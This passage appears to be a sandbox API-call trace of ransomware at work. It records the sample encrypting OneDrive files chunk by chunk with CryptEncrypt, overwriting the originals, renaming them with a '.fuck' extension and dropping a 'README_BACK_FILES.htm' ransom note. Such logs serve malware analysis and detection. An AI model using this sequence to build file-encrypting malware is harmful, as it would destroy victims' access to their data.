pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.159] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.160] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.161] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.163] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.163] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.172] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.172] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.172] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xc8, lpOverlapped=0x0) returned 1 [0275.172] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xc8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0) returned 1 [0275.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0275.173] CloseHandle (hObject=0x5d3c) returned 1 [0275.173] CloseHandle (hObject=0x5d48) returned 1 [0275.173] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0275.189] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0275.190] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0275.192] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0275.194] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0275.194] CryptDestroyKey (hKey=0x2fb208) returned 1 [0275.194] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0275.194] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0275.194] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0275.194] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\readme_back_files.htm")) returned 0xffffffff [0275.194] AreFileApisANSI () returned 1 [0275.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0275.194] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0275.195] GetFileType (hFile=0x5d4c) returned 0x1 [0275.195] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0275.215] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.215] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0275.215] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.215] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.215] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0275.215] GetLastError () returned 0x0 [0275.216] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui")) returned 0x20 [0275.216] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0275.217] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0275.218] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, 